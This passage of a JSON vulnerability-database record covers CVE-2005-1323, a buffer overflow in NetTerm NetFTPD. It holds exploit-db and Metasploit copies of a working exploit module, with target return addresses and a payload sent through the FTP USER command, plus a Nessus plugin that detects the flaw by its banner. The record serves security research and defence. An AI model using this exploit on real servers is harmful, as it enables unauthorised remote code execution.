#{target.name}...\")\r\n\r\n\t\t# U push ebp\r\n\t\t# S push ebx\r\n\t\t# E inc ebp\r\n\t\t# R push edx\r\n\t\t# \\x20\\xC0 and al, al\r\n\r\n\t\tbuf = rand_text_english(8192, payload_badchars)\r\n\t\tbuf[0, 1] = \"\\xc0\"\r\n\t\tbuf[1, payload.encoded.length] = payload.encoded\r\n\t\tbuf[1014, 4] = [ target.ret ].pack('V')\r\n\r\n\t\tsend_cmd( [\"USER #{buf}\"] )\r\n\t\tsend_cmd( ['HELP'] )\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16735/"}], "metasploit": [{"lastseen": "2020-08-02T23:06:18", "description": "This module exploits a vulnerability in the NetTerm NetFTPD application. This package is part of the NetTerm package. This module uses the USER command to trigger the overflow.\n", "published": "2005-11-24T19:04:37", "type": "metasploit", "title": "NetTerm NetFTPD USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1323"], "modified": "2018-09-15T23:54:45", "id": "MSF:EXPLOIT/WINDOWS/FTP/NETTERM_NETFTPD_USER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Ftp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NetTerm NetFTPD USER Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the NetTerm NetFTPD\n application. This package is part of the NetTerm package.\n This module uses the USER command to trigger the overflow.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-1323'],\n [ 'OSVDB', '15865'],\n [ 'URL', 'https://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'],\n [ 'BID', '13396'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\\x0a\\x20\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => [ 'win' ],\n 'Targets' =>\n [\n [\n 'NetTerm NetFTPD Universal', # Tested OK - hdm 11/24/2005\n {\n 'Ret' => 0x0040df98, # netftpd.exe (multiple versions)\n },\n ],\n [\n 'Windows 2000 English',\n {\n 'Ret' => 0x75022ac4, # ws2help.dll\n },\n ],\n [\n 'Windows XP English SP0/SP1',\n {\n 'Ret' => 0x71aa32ad, # ws2help.dll\n },\n ],\n [\n 'Windows 2003 English',\n {\n 'Ret' => 0x7ffc0638, # peb magic :-)\n },\n ],\n [\n 'Windows NT 4.0 SP4/SP5/SP6',\n {\n 'Ret' => 0x77681799, # ws2help.dll\n },\n ],\n ],\n 'DisclosureDate' => 'Apr 26 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n connect\n disconnect\n if (banner =~ /NetTerm FTP server/)\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n print_status(\"Trying target #{target.name}...\")\n\n # U push ebp\n # S push ebx\n # E inc ebp\n # R push edx\n # \\x20\\xC0 and al, al\n\n buf = rand_text_english(8192, payload_badchars)\n buf[0, 1] = \"\\xc0\"\n buf[1, payload.encoded.length] = payload.encoded\n buf[1014, 4] = [ target.ret ].pack('V')\n\n send_cmd( [\"USER #{buf}\"] )\n send_cmd( ['HELP'] )\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/netterm_netftpd_user.rb"}], "nessus": [{"lastseen": "2021-01-01T03:54:51", "description": "The remote server is running NetTerm Netftpd server.\n\nThere is a buffer overflow condition in the remote version of this\nsoftware. An attacker may exploit this flaw to execute arbitrary code\non the remote host with the privileges of the FTP server.", "edition": 26, "published": "2005-04-26T00:00:00", "title": "Intersoft NetTerm Netftpd USER Command Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1323"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:intersoft:netterm"], "id": "NETFTPD.NASL", "href": "https://www.tenable.com/plugins/nessus/18142", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude( 'compat.inc' );\n\nif(description)\n{\n script_id(18142);\n script_version (\"1.18\");\n script_cve_id(\"CVE-2005-1323\");\n script_bugtraq_id(13396);\n\n script_name(english:\"Intersoft NetTerm Netftpd USER Command Remote Overflow\");\n script_summary(english:\"Checks for NetTerm Netftpd\");\n\n script_set_attribute(\n attribute:'synopsis',\n value:'The remote service is prone to a buffer overflow.'\n );\n\n script_set_attribute(\n attribute:'description',\n value:\"The remote server is running NetTerm Netftpd server.\n\nThere is a buffer overflow condition in the remote version of this\nsoftware. An attacker may exploit this flaw to execute arbitrary code\non the remote host with the privileges of the FTP server.\"\n );\n\n script_set_attribute(\n attribute:'solution',\n value: \"Upgrade to a version of NetTerm greater than 5.1.1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'NetTerm NetFTPD USER Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(\n attribute:'see_also',\n value:'https://www.securityfocus.com/archive/1/396959'\n );\n \n # https://web.archive.org/web/20050727084625/http://www.securenetterm.com/html/what_s_new.html\n script_set_attribute(\n attribute:'see_also',\n value:'http://www.nessus.org/u?5567affe'\n );\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/04/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/04/26\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:intersoft:netterm\");\n script_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"FTP\");\n script_dependencie(\"ftp_anonymous.nasl\", \"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"ftp_func.inc\");\n\nport = get_ftp_port(default: 21);\n\nftpbanner = get_ftp_banner(port:port);\nif (! ftpbanner ) exit(1);\nif ( egrep(pattern:\"^220 NetTerm FTP server ready\", string:ftpbanner) )\n\tsecurity_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
